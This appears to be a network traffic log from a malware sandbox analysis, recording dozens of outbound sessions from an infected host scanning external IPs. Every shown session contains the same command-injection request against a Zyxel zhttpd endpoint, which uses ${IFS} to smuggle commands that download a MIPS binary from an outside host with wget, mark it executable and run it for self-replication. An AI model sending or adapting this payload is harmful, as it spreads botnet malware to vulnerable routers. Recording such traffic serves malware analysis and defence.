                                    Jan 13, 2024 19:02:25.989903927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2515192.168.2.1352954101.90.149.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989928007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2516192.168.2.1337192176.113.213.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.989949942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2517192.168.2.1356248213.163.86.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.990001917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2518192.168.2.134285059.230.192.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.990068913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2519192.168.2.1344736126.10.90.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.990070105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2520192.168.2.134556682.164.5.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.990108013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2521192.168.2.1342868160.44.148.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.990143061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2522192.168.2.135490048.182.23.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:25.990153074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2523192.168.2.1340006124.242.149.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.001817942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2524192.168.2.1347690169.81.66.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.001975060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2525192.168.2.1354290120.231.3.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002012014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2526192.168.2.1345920172.198.181.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002055883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2527192.168.2.133782073.137.245.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002084017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2528192.168.2.1338832159.163.134.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002156019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2529192.168.2.1340682111.102.239.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002216101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2530192.168.2.134499675.117.65.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002249002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2531192.168.2.135821291.143.181.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002340078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2532192.168.2.134990088.178.55.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002401114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2533192.168.2.1344678216.31.94.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002450943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2534192.168.2.135750684.210.66.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002526999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2535192.168.2.135398499.21.26.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002561092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2536192.168.2.1340642170.188.136.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002612114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2537192.168.2.1359680137.208.177.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002667904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2538192.168.2.134093838.190.216.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002722025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2539192.168.2.1347530192.218.102.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002768993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2540192.168.2.134717846.208.220.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002835989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2541192.168.2.1342358108.5.161.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002892017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2542192.168.2.133709625.248.69.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.002954006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2543192.168.2.1342908126.198.173.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003021002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2544192.168.2.1360602114.221.24.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003053904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2545192.168.2.1341734103.55.134.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003108025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2546192.168.2.1334304204.235.141.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003159046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2547192.168.2.1349584154.103.200.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003195047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2548192.168.2.133921681.66.211.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003277063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2549192.168.2.134514095.225.142.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003320932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2550192.168.2.133369873.247.43.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003359079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2551192.168.2.1348454216.72.33.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003401041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2552192.168.2.1339958136.16.163.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003428936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2553192.168.2.1343816221.172.33.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003489017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2554192.168.2.134380280.88.219.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003536940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2555192.168.2.1341538158.99.139.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003612041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2556192.168.2.1350424164.106.176.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003668070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2557192.168.2.135728025.112.43.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003739119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2558192.168.2.134370863.79.10.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003776073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2559192.168.2.135331087.250.76.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003834009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2560192.168.2.1335272198.85.144.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003911018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2561192.168.2.1351152126.55.158.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.003995895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2562192.168.2.1348476135.118.194.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004046917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2563192.168.2.1334176170.13.26.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004110098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2564192.168.2.135898867.175.221.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004157066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2565192.168.2.1342714166.15.247.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004205942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2566192.168.2.1355672131.140.36.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004280090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2567192.168.2.1357048139.236.248.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004328966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2568192.168.2.1340840137.71.34.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004394054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2569192.168.2.1360712178.38.91.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004435062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2570192.168.2.136005812.132.45.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004539967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2571192.168.2.1346642107.55.12.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004574060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2572192.168.2.1343786143.180.107.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004640102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2573192.168.2.133725468.99.11.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004713058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2574192.168.2.1344564162.171.193.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004776955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2575192.168.2.1336664211.185.147.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004848957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2576192.168.2.135723680.21.102.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.004916906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2577192.168.2.1356970134.179.176.175443
                                    TimestampBytes transferredDirectionData
